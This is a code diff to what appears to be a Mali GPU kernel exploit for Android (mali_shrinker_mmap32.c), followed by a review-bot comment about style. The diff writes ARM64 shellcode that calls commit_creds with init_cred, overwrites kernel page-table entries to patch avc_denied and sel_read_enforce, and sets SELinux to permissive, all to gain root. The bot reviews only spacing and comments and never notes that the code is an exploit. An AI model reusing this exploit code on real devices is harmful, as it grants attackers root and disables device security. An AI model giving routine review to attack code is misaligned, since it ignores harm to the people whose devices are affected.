diff --git a/mali_shrinker_mmap32.c b/mali_shrinker_mmap32.c
index 3cd6753..63e0ea9 100644
--- a/mali_shrinker_mmap32.c
+++ b/mali_shrinker_mmap32.c
@@ -91,6 +91,7 @@ Overwriting SELinux to permissive
 static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0};
 static uint32_t root_code[8] = {0};
+static uint32_t root_code2[8]={0};
 static uint32_t root_code_un[8] = {0};
 static uint8_t jit_id = 1;
@@ -469,15 +470,15 @@ void fixup_root_shell2(uint64_t init_cred, uint64_t commit_cred, uint64_t avc_de
 printf("Run fixup_root_shell2\n");
 uint32_t init_adpr = write_adrp(0, avc_deny, init_cred);
 // Sets x0 to init_cred
- root_code[ADRP_INIT_INDEX] = init_adpr;
- root_code[ADD_INIT_INDEX] = add_init;
+ root_code2[ADRP_INIT_INDEX] = init_adpr;
+ root_code2[ADD_INIT_INDEX] = add_init;
 // Sets x8 to commit_creds
- root_code[ADRP_COMMIT_INDEX] = write_adrp(8, avc_deny, commit_cred);
- root_code[ADD_COMMIT_INDEX] = add_commit;
- root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
- root_code[5] = 0xd63f0100; // blr x8
- root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
- root_code[7] = 0xd65f03c0; // ret
+ root_code2[ADRP_COMMIT_INDEX] = write_adrp(8, avc_deny, commit_cred);
+ root_code2[ADD_COMMIT_INDEX] = add_commit;
+ root_code2[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
+ root_code2[5] = 0xd63f0100; // blr x8
+ root_code2[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
+ root_code2[7] = 0xd65f03c0; // ret
 printf("End fixup_root_shell2\n");
 }
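Review bot: The new global on the `+static uint32_t root_code2[8]={0};` line is declared with no spaces around `=`, unlike the neighbouring `root_code` and `root_code_un` declarations, and nothing on the page says what distinguishes it from `root_code`, which has the same size and is filled with the same instruction sequence by the rewritten body of fixup_root_shell2. A one-line comment at the declaration would answer the question a later reader will ask, for example `static uint32_t root_code2[8] = {0}; // separate copy filled by fixup_root_shell2; root_code stays in use by its sibling caller (confirm)`. It would also help to state in that comment which array each caller is expected to consume, since the two arrays can drift apart silently once they are edited independently. fixup_root_shell2's signature line sits above the hunk, so any additional parameters it takes are not visible here.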
@@ -690,33 +691,15 @@ void write_selinux(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved)
 //Go through the reserve pages addresses to write to avc_denied with our own shellcode
 write_data(mali_fd2, selinux_enforcing, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, 0, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
 }
-/*for onyx void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) {
- uint64_t sel_read_handle_unknown_addr = (((sel_read_handle_unknown + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
- write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_handle_unknown_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
-
- usleep(100000);
-
- //Call commit_creds to overwrite process credentials to gain root
- write_func(mali_fd2, sel_read_handle_unknown, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code_un[0]), sizeof(root_code_un)/sizeof(uint32_t));
-// write_func(mali_fd2, selinux_enforcing_READ, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
-// write_func(mali_fd2, selinux_enforcing_WRITE, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
-}
-*/
-//original code(avc_deny)
-void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) {
- /* Skip this
 uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
 write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
 usleep(100000);
 //Go through the reserve pages addresses to write to avc_denied with our own shellcode
- write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t));
+ write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code2[0]), sizeof(root_code2)/sizeof(uint32_t));
- //Triggers avc_denied to disable SELinux
- open("/dev/kmsg", O_RDONLY);
- */
 uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
 write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);